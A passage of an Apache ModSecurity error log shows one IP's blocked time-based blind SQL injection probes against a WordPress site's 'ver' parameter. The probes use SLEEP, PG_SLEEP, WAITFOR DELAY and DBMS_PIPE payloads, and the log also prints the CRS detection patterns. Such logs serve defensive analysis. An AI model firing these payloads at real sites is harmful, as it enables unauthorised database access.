[Sat Aug 31 01:18:04.114739 2024] [:error] [pid 9366:tid 140590377297664] [client 193.29.13.20:37702] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47;SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nA1VuGGNTxm_kiOErAAAAM0"] [Sat Aug 31 01:18:04.445923 2024] [:error] [pid 9366:tid 140590402475776] [client 193.29.13.20:37704] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47');SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nA1VuGGNTxm_kiOErQAAAMo"] [Sat Aug 31 01:18:04.755465 2024] [:error] [pid 9366:tid 140590310156032] [client 193.29.13.20:37706] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nA1VuGGNTxm_kiOErgAAANU"] [Sat Aug 31 01:18:05.060608 2024] [:error] [pid 8675:tid 140590531704576] [client 193.29.13.20:37708] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47%';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nZdLCjsWrLhZKAOZbQAAAEM"] [Sat Aug 31 01:18:05.363711 2024] [:error] [pid 9366:tid 140590368904960] [client 193.29.13.20:37710] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47);SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nQ1VuGGNTxm_kiOErwAAAM4"] [Sat Aug 31 01:18:05.671665 2024] [:error] [pid 9366:tid 140590343726848] [client 193.29.13.20:37712] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47;SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nQ1VuGGNTxm_kiOEsAAAANE"] [Sat Aug 31 01:18:05.975055 2024] [:error] [pid 8675:tid 140590419261184] [client 193.29.13.20:37714] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47');SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nZdLCjsWrLhZKAOZbgAAAEg"] [Sat Aug 31 01:18:06.287970 2024] [:error] [pid 8672:tid 140590301763328] [client 193.29.13.20:37716] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1ng3r8UJC0kxJCKSq6QAAABY"] [Sat Aug 31 01:18:06.591954 2024] [:error] [pid 9366:tid 140590531704576] [client 193.29.13.20:37718] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:ver: 1.8.5.47%';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1ng1VuGGNTxm_kiOEsQAAAMM"] [Sat Aug 31 01:18:06.892216 2024] [:error] [pid 9366:tid 140590293370624] [client 193.29.13.20:37720] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47);WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1ng1VuGGNTxm_kiOEsgAAANc"] [Sat Aug 31 01:18:07.196654 2024] [:error] [pid 9366:tid 140590360512256] [client 193.29.13.20:37722] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47;WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nw1VuGGNTxm_kiOEswAAAM8"] [Sat Aug 31 01:18:07.525829 2024] [:error] [pid 9366:tid 140590419261184] [client 193.29.13.20:37724] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47');WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nw1VuGGNTxm_kiOEtAAAAMg"] [Sat Aug 31 01:18:07.826741 2024] [:error] [pid 9366:tid 140590385690368] [client 193.29.13.20:37726] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1nw1VuGGNTxm_kiOEtQAAAMw"] [Sat Aug 31 01:18:08.125120 2024] [:error] [pid 9366:tid 140590556882688] [client 193.29.13.20:37728] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:ver: 1.8.5.47%';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1oA1VuGGNTxm_kiOEtgAAAMA"] [Sat Aug 31 01:18:08.453168 2024] [:error] [pid 8676:tid 140590368904960] [client 193.29.13.20:37730] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(102)||CHR(115)||CHR(83),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1oGm8LEssXUq6wJ2LKwAAAI4"] [Sat Aug 31 01:18:08.759644 2024] [:error] [pid 8675:tid 140590394083072] [client 193.29.13.20:37732] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(102)||CHR(115)||CHR(83),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1oJdLCjsWrLhZKAOZbwAAAEs"] [Sat Aug 31 01:18:09.069467 2024] [:error] [pid 8675:tid 140590377297664] [client 193.29.13.20:37734] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(102)||CHR(115)||CHR(83),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1oZdLCjsWrLhZKAOZcAAAAE0"] [Sat Aug 31 01:18:09.400584 2024] [:error] [pid 8676:tid 140590360512256] [client 193.29.13.20:37736] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(102)||CHR(115)||CHR(83),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1oWm8LEssXUq6wJ2LLAAAAI8"] [Sat Aug 31 01:18:09.736207 2024] [:error] [pid 8675:tid 140590343726848] [client 193.29.13.20:37738] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:ver: 1.8.5.47%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(102)||CHR(115)||CHR(83),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1oZdLCjsWrLhZKAOZcQAAAFE"] [Sat Aug 31 01:18:10.068656 2024] [:error] [pid 9366:tid 140590318548736] [client 193.29.13.20:37740] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47) AND SLEEP(5) AND (9027=9027"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1og1VuGGNTxm_kiOEtwAAANQ"] [Sat Aug 31 01:18:10.371529 2024] [:error] [pid 8672:tid 140590410868480] [client 193.29.13.20:37742] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47 AND SLEEP(5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1og3r8UJC0kxJCKSq6gAAAAk"] [Sat Aug 31 01:18:10.682088 2024] [:error] [pid 9366:tid 140590326941440] [client 193.29.13.20:37744] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:ver: 1.8.5.47') AND SLEEP(5) 